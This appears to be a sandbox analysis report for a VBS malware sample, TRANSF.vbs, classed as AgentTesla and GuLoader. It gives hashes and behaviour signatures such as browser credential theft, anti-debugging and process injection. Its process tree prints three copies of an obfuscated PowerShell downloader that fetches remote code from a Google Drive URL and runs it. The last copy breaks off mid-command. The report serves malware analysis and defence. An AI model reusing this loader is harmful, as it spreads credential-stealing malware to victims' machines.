Overview

overview

10

Static

static

1

TRANSF.vbs

windows7-x64

10

TRANSF.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-09-2024 14:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TRANSF.vbs

  • Size

    19KB

  • MD5

    0f800567f6a43b8ffd8e798bc9f6d0ef

  • SHA1

    cafb5d7641be2a7b09df950ca18d4fcdce3d86c9

  • SHA256

    4ac0cae97c31320f59c86ff1a49916abe51417f3e71efbb2794a619285d5c2c5

  • SHA512

    84ce5da3d8b4effd3ee79c483919396f2cb4084da39ca4e8f868bfcf71af7b243693bb7ee9c0b208bf9737ce5b82f3b2d613fdb29737b2bf0007319898267964

  • SSDEEP

    384:QQ3GOmBsxCn6EPbz4KGsucW3k82RhyUKYHTKGPQ5PEf8szkM8vtbn2DlXQBb:t39cs86EPbjSmlTKGQPu8ckjF2Rab

Score
10/10
agentteslaguloadercredential_accessdiscoverydownloaderexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TRANSF.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1856
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Boko.Duc && echo t"
        3⤵
          PID:2120
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S i(Visi$FamiMbyriaHackaReklnB dseTilkf Talo .ntrSkelmSitir iktkUdraeUnsilNed.sFliceIns rErgunPeyoeVa i,Phyl$A atF Th,lAmm uStamgLyketSandsOgdokUndayDis dVelsnLan.i ,genOverg sube.rrenLslas Fr ) cab ');firsaariges $Undervgtets;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Birdmouthed Enciclopedia Cultirostres #>;$blaasyren='Optagelsesprven';<#Ammestuehistorierne Spried Ebullition Malous Multitarian Natskygge #>;$Quininise=$host.PrivateData;If ($Quininise) {$skaaneprogrammers++;}function Nonaristocratically($Duryl){$Sportsmanship217=$Duryl.Length-$skaaneprogrammers;for( $Insnarers=4;$Insnarers -lt $Sportsmanship217;$Insnarers+=5){$Consolatrix+=$Duryl[$Insnarers];}$Consolatrix;}function firsaariges($Ekspeditionssystemet){ & ($Shortness) ($Ekspeditionssystemet);}$eftertaklede=Nonaristocratically 'Sei,MPleaoPro,zbottiindul onelReciaEkst/Prim5Bjer. Lin0Hydr Stud(Ob iWFunki S,unId.odForeo arwWawisin e CaruNForhTFlyg Fris1 uri0Magn.Linj0Trfi; Sin PoliW Duvi PolnDdss6Sjnx4Sbed; A c BrocxAhnf6Anti4Kale; D,s ChamrSvmmv Cro:Defe1bro 2Pati1brk .Efte0k nt) .lu niveGBombeMa.ec psakPel,oGi s/ov.r2Dele0Krte1Sowf0 Res0 Hos1S ar0Sam 1La n Rin Fopsei,ostr PaneUncofEg,noHardxHava/ cha1traw2Oddv1 ema. Und0O ko ';$Aspidiaria=Nonaristocratically 'Sorgu AnsS SetEInsuR Pre-Ufora ForGFolkEDesiNb.jot ool ';$Fysiologer141=Nonaristocratically 'frithP sttOblitSpaap Kb.sStud:Baro/ Opl/An kd.epmrPreei TaxvBryge Lej.Sk lgP,ncoDireoSkibgDa alBortespif.Reprc AsyoFo km Uns/F lmuAnticHomo?UncreBeb.xSmi pT raoAutorHypetLila=DispdMusio ThlwHusgnR.celBrneoW ntaAfstdAfba& ndeiSupedKomp=Tato1AnabRfor FAn ivTuttkfa tqDaktbAd okB dsTAfteTGaskEA frl ittXMicrOB ohw pilrMediDZaba0Ren,EP ivb oriKase8Un uG BraO SubUPrimaSomaCSlutGguatWGyrooSomnGta shTsetL De ';$Panax=Nonaristocratically ' .er>Bort ';$Shortness=Nonaristocratically 'DrnnIState nsaxVild ';$Bewpers='Overnormality163';$overdrawing = Nonaristocratically 'Fur.eBuilc rehMu,io Sel Pral%HektaNonapDingpDenddUnliaAflyt OveaD xi%Octa\UnenBPerioBo.kk ndeoCala.Su nDJenmu Humc It Faci& ar& Pha OveestancVatihGlasoAl,a BriatS.is ';firsaariges (Nonaristocratically 'Bro $Undig Saml Wono VejbScria Resl nti: B.uP Fa ic,ullU jeoTet,tNyans Appy SkasUn.et Fo eTal mVridePostrforvsSlop=Afgi(StalcHushmcentdIrre T al/AerocServ Krep$ PomoSandv roeSlr.rWaxydDikerb dyaLin wViatiDansn PengSmil)over ');firsaariges (Nonaristocratically 'Luge$sinog Aa lPerfo reabGardaBactlReca:Ens Fpar,oModerKn vrSvine nentcoelnKonki ran Anng PrasFibrgNoniaMedun .ilg,ande Gennmilj=Sekt$VlveFAbbay arksTes.iTilfo SoulPilgoR,gigDe.oeSubmr,ene1Side4Soli1Kryo. F.os vulp DeclPreci rstGle (Irre$RediPtilva Po n Te aNewtxKo s)Menn ');firsaariges (Nonaristocratically ' Sca[MorbN.ngle SmatGrow.ResoS Sy eSkjarMascvRedaiStilc tykeLsreP DeloNonpiModsn JodtMyliMLampaOpfanApsia betgReepe OmhrOpfo]Arv : Ic,:DesiSI iteTid cSkiluBaftr hvii Re t S kyAlbuPNo pr PiroPi dtLaunoFirec De.oMat lAcce Uni=Pl i Rhod[Sp,nN arteDismtAfsk.PeriSbelgeneoncEma uUnexrN rriIndotAktuyUnhyPMal rSubooDatotC.rroRingcBungoLabilEnsiTOve yBaggpfljte Per]Komm:kerf:Inu,TBorolgastsO er1Cari2Te p ');$Fysiologer141=$Forretningsgangen[0];$Microcomputers= (Nonaristocratically ' Pal$ForggTearLRappOAspab yopATalllLavs:No.nJBracEPapia Mo N WitNGinkASkam7Urti1Kurs=sty NToldeNutrWChai-M ndOLoatbSpavJpreceTon cCopatVen ends FruYPre stowntCy,leaabnMTher.IndgNnymaerorst,nel.ForuwD spES brB.usoCpa alBev,iM.saEOrphN U dT');$Microcomputers+=$Pilotsystemers[1];firsaariges ($Microcomputers);firsaariges (Nonaristocratically 'Laza$textJStraeLigeaGoatnSternRet aB un7Cyke1Tart. SouH RameSnowaA,sadUgene PhrrA ris Fer[Inte$IchtA nonsS,alpKateiRespd U si PikaKo srLipsi u,faF,rl] Agn=Iris$Sha.eStorfVerdtBrave DanrUns tHon a.uftk url laeConsdvyaseSubm ');$Ophugning=Nonaristocratically 'Unde$ .riJ Vrde Stra ,non Oprn hilarin 7 Co 1.idt.MoonDunboo.aprwSandnAndelNavloNiveaPrivd raFsauciTrill Omre inu( Fli$ GasFFilmyRygtsB buiducho TurlSuffoSlupg,olie F rrHjla1,amm4Ggl 1Omst, Unf$ TeeSUnfauIntelCistp Fe hdat oFysibBr.deBrusnFotozadkooBio.a Bagt Teae Fem1Acry5Bold7 No ) raa ';$Sulphobenzoate157=$Pilotsystemers[0];firsaariges (Nonaristocratically 'Chup$ Vi,gFrarLskruO R.aBEde ASpttlScr.: ymR ForeAdeslIndeaH ndKAdhrsHemaaUndeTBe sI pneoF.brnbulkE s,rr riSUsig=Ch m( In TLsthE AlmSThrutMetr-F.asP skrA LymtBarrhCros Floa$Enhos tunU,avnlL xipDezihBorgorevoB ZooE TyvnOverzBogaoMartAs azT onveSkab1 Dde5 om7 Dol)Samp ');while (!$Relaksationers) {firsaariges (Nonaristocratically ' tat$ CutgChoulfremo houb rteaSomnl Sek:Fu hUAgusnRek,lF,naoSpiro olisGlyce ResnF essSyre=Co n$NasutNewpr ndku jereddss ') ;firsaariges $Ophugning;firsaariges (Nonaristocratically '.rotSLaget usta adarF rstNeu -Act SBeamlTaraeGange aupGryd Dei4Libe ');firsaariges (Nonaristocratically 'e os$ evegForelPolyoL,ncbEmita Spil tuk:InexRSteveMrenl VitaFi ikS ccsreviaBrant isaiValgoImpunSucceChinr Br s Pl,=Sk r(NuanTansteSobesAa,rtSlov-Sk lP lapaFreatYahahVold Fre$M taSUdbluC nslDambpIc,nh ticomu rb Keke.yern Wi.zm djoAmela rebtTi reFict1Spr,5Sjof7Vdd,)Toas ') ;firsaariges (Nonaristocratically 'Fods$ UdsgPsyclKonsoN.pobBl vaUnail tj:BlndMBetve nddAut vBortiCloon.evad Ka eSis.nUdk.eSi msetap=Prot$culggF skl Ac oE,mebWearaKamel Sp :NulpTNumea FibsUdletPloutFlokrmi.ry KrnkResi+Salg+Indl%Vild$Uv,dF lao o frS.ror Same Spst FstnForui ,uanAmmug TytsSoprg,chia mfonBarygperieRettnObve.rystcSavaolegiu GognErhvtForm ') ;$Fysiologer141=$Forretningsgangen[$Medvindenes];}$Maaneformrkelserne=309487;$Flugtskydningens=27293;firsaariges (Nonaristocratically ' ,un$Var gGeodlKlamo,capbingeaRentlSter:HereSOakukKommo,alalV,lfdb.rtk Famomatup ,nipNegle .orrdebonBalkeByggs nv F.te=Bi a ardG utne.efutBouc-SothC Ekso Oven Fe tStrae CadnNonotImmi heli$TrueSRa suspecl ReipGra,hLukko.ullbCa aeFragnEndazMesao ,apa .ewtol fePhil1Co m5hjde7Elec ');firsaariges (Nonaristocratically 'nat $Festg rotlV rioBogwb FlaaClumlArbe:WabbSPluseAltrcMicrtRiveiParal,ambeSl p Rand= Vi Acco[,berSRadiy s isSisktBroge UnpmFlyv. OveCAfdroKollnDeglv OveeTautrPlagtDemo]Fore: For:KompF BoxrS anoHarrm OplBNonraCrissMeteeAmts6Inde4 GokSNomatSkovr Alli B,nn undgTota(Unic$M siS,eunkkom oapprlSubddU rakBo doRe lpWi wpOvereOpkrrLighnVarneHalvsSeac)Op e ');firsaariges (Nonaristocratically ' Che$Fa igl eblF ruoK erb sh aUnwalSves:CaluYOdysa G.ag WreuQue,aByggsUd.i Infl=O,dr Kamp[ G nSe teyDomesOdobt s neTe emK um.Hel TTecae Va.x ogatAddu.BracEPrognVrngcBam oBrowdHexaiOtacnM neg Pol]Laps:crys: arAForrSBe kC Of I Me.IKuve.Ne,kGArmheTrestVoksSOmsttfagfr osiByrdnKomigPlio( Ill$TranSUndeembelcD,sktEntriPerol P de,upe)supe ');firsaariges (Nonaristocratically 'Stvl$j legkefflForeo PorbKalkaIn,olPas :TumuUDilin Appd PiveA.alr Br vindvgMeletFrigeLe,ttMonosSens=Re o$Sup Y KonaExplgForfuForwaL xns ure.Damps ph u nkebTohasAfspt ClarPalmiSignn K,tg S 